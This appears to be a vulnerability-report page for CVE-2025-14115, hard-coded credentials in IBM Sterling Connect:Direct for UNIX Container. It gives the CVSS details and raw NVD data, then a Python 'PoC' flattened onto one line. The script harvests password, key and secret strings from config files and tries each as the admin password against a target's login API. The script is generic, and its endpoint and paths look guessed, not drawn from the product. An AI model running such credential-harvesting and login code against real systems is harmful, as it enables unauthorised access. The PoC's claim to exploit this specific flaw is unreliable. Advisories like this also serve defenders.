Security Vulnerability Report
中文
CVE-2025-14115 CVSS 8.4 HIGH

CVE-2025-14115

Published: 2026-01-20 15:16:14
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019 IBM® Sterling Connect:Direct for UNIX contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 - 6.3.0.6 Interim Fix 016
IBM Sterling Connect:Direct for UNIX Container 6.4.0.0 - 6.4.0.3 Interim Fix 019

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14115 PoC - IBM Sterling Connect:Direct Hard-coded Credentials # This PoC demonstrates searching for hard-coded credentials in the affected product import requests import re import os import subprocess TARGET_HOST = "target_server" TARGET_PORT = 8443 def search_hardcoded_credentials(): """Search for hard-coded credentials in IBM Sterling Connect:Direct""" # Common hardcoded credential patterns to search credential_patterns = [ r"password\s*=\s*['\"][^'\"]+['\"]", r"PASSWORD\s*=\s*['\"][^'\"]+['\"]", r"passwd\s*=\s*['\"][^'\"]+['\"]", r"key\s*=\s*['\"][^'\"]+['\"]", r"secret\s*=\s*['\"][^'\"]+['\"]", r"encrypt\s*=\s*['\"][^'\"]+['\"]", ] # Search in common locations search_paths = [ "/opt/ibm/cdirect/", "/opt/IBM/ConnectDirect/", "/etc/cdirect/", "./config/", ] found_credentials = [] for path in search_paths: if os.path.exists(path): for root, dirs, files in os.walk(path): for file in files: if file.endswith(('.conf', '.cfg', '.xml', '.properties', '.py', '.sh', '.jar')): filepath = os.path.join(root, file) try: with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() for pattern in credential_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches: found_credentials.append({ 'file': filepath, 'matches': matches }) except Exception as e: continue return found_credentials def exploit_hardcoded_credential(credential): """Attempt to exploit hard-coded credential for authentication bypass""" # Try to authenticate using hardcoded credentials auth_payload = { 'username': 'admin', 'password': credential } try: response = requests.post( f'https://{TARGET_HOST}:{TARGET_PORT}/api/login', json=auth_payload, verify=False, timeout=10 ) if response.status_code == 200: token = response.json().get('token') print(f"[!] Successfully authenticated with hardcoded credential!") print(f"[*] Token: {token}") return token except Exception as e: print(f"[*] Authentication attempt failed: {e}") return None def main(): print("[*] CVE-2025-14115 - IBM Sterling Connect:Direct Hard-coded Credentials PoC") print("[*] Searching for hardcoded credentials...") credentials = search_hardcoded_credentials() if credentials: print(f"[!] Found {len(credentials)} potential hardcoded credentials") for cred in credentials: print(f"\n[File] {cred['file']}") for match in cred['matches']: print(f" - {match}") exploit_hardcoded_credential(match.split('=')[1].strip('\"\' ')) else: print("[*] No hardcoded credentials found in standard locations") print("[*] Try manual inspection of configuration files and binaries") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14115", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:14.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019 IBM® Sterling Connect:Direct for UNIX contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data."}, {"lang": "es", "value": "IBM Sterling Connect:Direct para UNIX Contenedor 6.3.0.0 hasta 6.3.0.6 Arreglo Provisional 016, y 6.4.0.0 hasta 6.4.0.3 Arreglo Provisional 019 IBM® Sterling Connect:Direct para UNIX contiene credenciales codificadas de forma rígida, como una contraseña o clave criptográfica, que utiliza para su propia autenticación de entrada, comunicación de salida a componentes externos, o cifrado de datos internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7257143", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.